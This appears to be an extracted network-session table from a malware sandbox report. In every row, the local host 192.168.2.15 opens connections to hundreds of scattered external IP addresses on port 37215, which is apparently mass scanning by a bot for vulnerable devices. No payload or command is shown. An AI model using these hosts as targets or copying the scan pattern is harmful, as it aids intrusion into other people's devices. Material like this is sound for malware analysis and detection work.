                                              26034192.168.2.153981441.213.82.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26035192.168.2.1551272121.21.147.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26036192.168.2.1547762157.61.156.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26037192.168.2.1538232122.7.200.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26038192.168.2.153872237.117.21.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26039192.168.2.156090837.125.0.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26040192.168.2.1551256122.100.41.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26041192.168.2.154075637.20.247.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26042192.168.2.153566031.107.136.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26043192.168.2.1536066157.60.222.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26044192.168.2.1540208186.230.172.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26045192.168.2.1535596122.244.204.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26046192.168.2.1548926156.74.212.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26047192.168.2.1535384186.15.50.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26048192.168.2.155584437.127.53.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26049192.168.2.1542644138.0.179.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26050192.168.2.1546832222.164.176.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26051192.168.2.1540204102.215.132.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26052192.168.2.1554434181.125.137.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26053192.168.2.154221837.80.185.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26054192.168.2.1534640156.189.5.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26055192.168.2.155409225.219.32.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26056192.168.2.1545608122.183.111.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26057192.168.2.1559260157.5.2.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26058192.168.2.1550154121.209.42.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26059192.168.2.1547382222.113.147.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26060192.168.2.1543174121.60.133.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26061192.168.2.1550558121.221.163.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26062192.168.2.1553230122.10.95.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26063192.168.2.1553254190.130.67.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26064192.168.2.1543560121.211.128.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26065192.168.2.154951494.89.182.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26066192.168.2.1549700122.63.20.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26067192.168.2.153388641.123.92.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26068192.168.2.1551878156.189.56.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26069192.168.2.1532944122.120.126.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26070192.168.2.154470088.181.165.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26071192.168.2.1534850222.14.205.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26072192.168.2.1559322156.5.133.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26073192.168.2.1557796157.158.248.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26074192.168.2.1539932138.143.96.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26075192.168.2.1553420122.100.11.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26076192.168.2.1560162102.78.72.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26077192.168.2.1533868138.161.223.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26078192.168.2.1550724122.46.211.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26079192.168.2.1548818102.225.226.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26080192.168.2.1550752157.106.164.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26081192.168.2.1545062121.234.102.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26082192.168.2.1555192138.201.76.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26083192.168.2.1551674138.209.67.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26084192.168.2.1548410197.167.219.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26085192.168.2.1548600197.128.103.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26086192.168.2.1546396157.166.222.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26087192.168.2.1557512156.9.94.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26088192.168.2.153476894.206.94.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26089192.168.2.1555264181.53.179.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26090192.168.2.1555046138.199.81.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26091192.168.2.1551882157.124.108.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26092192.168.2.155278231.101.226.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26093192.168.2.1559988121.21.68.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26094192.168.2.1550796222.147.5.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26095192.168.2.1548862157.83.163.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26096192.168.2.1533882157.12.146.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26097192.168.2.1542102204.19.49.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26098192.168.2.1560396157.195.133.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26099192.168.2.1554582157.16.79.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26100192.168.2.154637637.221.172.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26101192.168.2.1550094181.153.143.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26102192.168.2.154437845.143.127.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26103192.168.2.1539018121.226.56.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26104192.168.2.1537956222.202.48.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26105192.168.2.154839845.131.156.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26106192.168.2.154415837.41.131.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26107192.168.2.1546584186.20.126.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26108192.168.2.1552948102.35.216.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26109192.168.2.1534996222.207.199.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26110192.168.2.154434641.110.199.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26111192.168.2.153847041.26.115.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26112192.168.2.154592494.102.138.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26113192.168.2.1553742156.147.26.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26114192.168.2.1554064222.146.67.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26115192.168.2.155794645.79.194.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26116192.168.2.1551434121.29.194.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26117192.168.2.1560584118.53.107.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26118192.168.2.1554808173.27.186.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26119192.168.2.1539042197.100.95.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26120192.168.2.154924041.240.21.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26121192.168.2.1540804197.200.120.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26122192.168.2.1548704190.3.159.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26123192.168.2.155571231.111.166.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26124192.168.2.153711045.206.88.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26125192.168.2.155627294.189.97.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26126192.168.2.155266637.104.153.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26127192.168.2.1539230157.75.183.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26128192.168.2.155949245.192.102.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26129192.168.2.1556040186.21.222.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26130192.168.2.1537238186.85.245.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26131192.168.2.1533536222.197.152.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26132192.168.2.154905037.169.152.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26133192.168.2.1548694138.90.170.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26134192.168.2.1535436156.62.86.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26135192.168.2.1555452186.15.146.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26136192.168.2.153613037.17.28.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26137192.168.2.153508641.56.17.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26138192.168.2.155379694.183.245.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26139192.168.2.1557904102.196.113.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26140192.168.2.156018845.130.16.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26141192.168.2.156098231.118.145.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26142192.168.2.1546008156.198.191.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26143192.168.2.1544192186.75.70.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26144192.168.2.155289231.62.72.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26145192.168.2.1549306197.144.0.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26146192.168.2.1537228117.230.143.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26147192.168.2.155513231.70.70.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26148192.168.2.1536028157.119.119.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26149192.168.2.1533706122.20.229.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26150192.168.2.155727431.32.178.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26151192.168.2.1557340197.245.236.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26152192.168.2.155896231.229.157.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26153192.168.2.153826045.31.215.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26154192.168.2.153574080.164.46.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26155192.168.2.1557848121.251.0.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26156192.168.2.1549464181.192.68.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26157192.168.2.1535140181.187.183.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26158192.168.2.1543090168.64.243.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26159192.168.2.155831294.128.55.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26160192.168.2.1549156222.121.142.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26161192.168.2.155699694.45.188.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26162192.168.2.154749641.22.240.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26163192.168.2.1544088190.105.8.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26164192.168.2.1533330122.229.55.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26165192.168.2.1558398181.111.241.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26166192.168.2.1560166222.5.37.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26167192.168.2.1535368190.118.225.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26168192.168.2.1558502197.105.138.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26169192.168.2.1534756197.63.198.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26170192.168.2.1555954181.92.69.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26171192.168.2.1534364162.39.45.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26172192.168.2.1558614156.189.246.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26173192.168.2.1550684181.52.124.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26174192.168.2.1560872122.55.116.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26175192.168.2.155167241.147.208.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26176192.168.2.1538604157.138.200.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26177192.168.2.1544210197.124.8.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26178192.168.2.155347031.240.162.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26179192.168.2.153358631.19.177.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26180192.168.2.155691041.27.33.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26181192.168.2.1539376122.178.93.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26182192.168.2.1554018195.12.67.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26183192.168.2.1547762138.179.248.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26184192.168.2.154003694.216.167.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26185192.168.2.1547580186.187.108.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26186192.168.2.1541502156.89.113.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26187192.168.2.155409645.161.217.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26188192.168.2.1545588222.174.231.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26189192.168.2.1560104181.105.180.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26190192.168.2.1538766121.182.132.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26191192.168.2.1533574197.233.243.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26192192.168.2.1543492186.89.86.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26193192.168.2.1546120156.81.112.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26194192.168.2.1544080222.167.68.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26195192.168.2.1558834138.75.226.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26196192.168.2.1533934190.79.40.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26197192.168.2.1540670190.239.220.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26198192.168.2.153504431.226.110.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26199192.168.2.154723841.215.97.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26200192.168.2.1543272186.63.131.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26201192.168.2.154505894.119.173.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26202192.168.2.156072245.245.39.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26203192.168.2.1533174181.147.160.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26204192.168.2.1537210222.51.26.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26205192.168.2.155354494.97.173.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26206192.168.2.1534924121.69.43.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26207192.168.2.1557566197.8.71.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26208192.168.2.1548040121.81.222.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26209192.168.2.1555372197.80.89.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26210192.168.2.1548964186.114.39.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26211192.168.2.1559646122.78.222.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26212192.168.2.1542782186.141.151.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26213192.168.2.1533672138.243.208.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26214192.168.2.1532980102.189.111.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26215192.168.2.153386841.74.244.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26216192.168.2.1548186102.8.20.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26217192.168.2.1556348196.113.99.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26218192.168.2.1537634121.55.249.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26219192.168.2.1554418156.141.66.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26220192.168.2.1556302102.98.94.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26221192.168.2.1556874181.105.49.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26222192.168.2.1542016197.247.164.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26223192.168.2.1555970122.41.91.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26224192.168.2.1534188102.1.243.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26225192.168.2.1559336102.204.250.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26226192.168.2.155240841.57.189.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26227192.168.2.1555306222.30.56.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26228192.168.2.1545246154.11.244.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26229192.168.2.1552540102.43.165.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26230192.168.2.1535338138.230.76.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26231192.168.2.1536602121.207.43.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26232192.168.2.1549792181.89.187.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26233192.168.2.1558550102.101.117.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26234192.168.2.155070894.116.140.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26235192.168.2.1559708138.181.79.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26236192.168.2.156062045.232.233.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26237192.168.2.1533588138.74.206.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26238192.168.2.1539966197.246.102.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26239192.168.2.1533422156.185.144.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26240192.168.2.1557430186.233.196.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26241192.168.2.154623494.87.40.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26242192.168.2.154831494.171.141.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26243192.168.2.1539404102.236.109.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26244192.168.2.155794445.242.248.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26245192.168.2.1544060157.77.61.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26246192.168.2.1560822156.132.108.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26247192.168.2.1547902102.212.238.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26248192.168.2.1539516186.102.26.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26249192.168.2.154081831.193.109.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26250192.168.2.1535002102.58.194.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26251192.168.2.1558654121.127.219.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26252192.168.2.1551832222.120.247.17037215
